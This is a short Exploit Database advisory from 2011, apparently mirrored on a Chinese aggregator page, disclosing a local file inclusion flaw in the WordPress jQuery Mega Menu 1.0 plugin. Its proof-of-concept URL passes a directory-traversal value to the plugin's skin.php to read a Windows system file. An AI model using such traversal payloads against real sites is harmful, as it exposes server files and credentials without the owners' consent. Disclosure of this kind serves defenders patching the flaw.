WordPress Plugin jQuery Mega Menu 1.0 – Local File Inclusion

• Exploit Database
• 8 阅读

• 作者： AutoSec Tools
  日期： 2011-02-26
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16250/

• Source: http://packetstormsecurity.org/files/view/98753/WordPressjQueryMegaMenu1.0-lfi.txt
  
  ------------------------------------------------------------------------
  Software................WordPress jQuery Mega Menu 1.0
  Vulnerability...........Local File Inclusion
  Download................http://www.designchemical.com/blog/index.php/wordpress-plugins/wordpress-plugin-jquery-drop-down-mega-menu-widget/
  Release Date............2/25/2011
  Tested On...............Windows 7 + XAMPP
  ------------------------------------------------------------------------
  Author..................AutoSec Tools
  Site....................http://www.autosectools.com/
  ------------------------------------------------------------------------
  
  --Description--
  
  A local file inclusion vulnerability in WordPress jQuery Mega Menu 1.0
  can be exploited to include arbitrary files.
  
  
  --PoC--
  http://localhost/wordpress/wp-content/plugins/jquery-mega-menu/skin.php?skin=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini